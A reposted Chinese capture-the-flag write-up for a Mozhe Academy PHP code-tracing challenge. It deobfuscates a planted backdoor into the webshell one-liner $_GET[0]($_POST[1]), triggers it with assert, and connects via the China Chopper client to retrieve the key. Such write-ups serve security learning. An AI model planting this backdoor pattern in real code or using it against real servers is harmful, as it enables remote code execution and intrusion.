墨者學院靶場之PHP代碼分析溯源(第1題)


申請靶場環境后

點開題目

一段奇怪的PHP代碼

因為我自己電腦重裝了win10系統,php+apache+mysql的環境本地主機覺得沒必要弄了,於是我們用在線的PHP編碼(百度一下到處都是)

復制進去以";"來排個格式

運行下,報錯。

看看源碼,"$_"     "$__"     "$___" 這三個是變量名,我們用echo輸出下內容

連在一起了,但是可以確定

$_ => 1

$__ => _GET

$___ => _POST

然后觀察最后一行代碼,把我們變量給用值替換進去

${_GET}[!1](${_POST}[1]); 

把多余的{}去掉 [!1]也就是[0],整理下代碼是這樣的

$_GET[0]($_POST[1]); 

和一句話的$_POST[1]傳參差不多了,那么$_GET[0]就是我們的函數名了

根據"b.php源碼"提示去b.php目錄下

用hackbar傳GET和POST請求

但是並沒有返回phpinfo的信息。

這里又百度了下,學習到了新的知識點assert與eval的區別

我們改成0=assert

phpinfo顯現出來了,用菜刀連接下

將key提交上去,正確。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM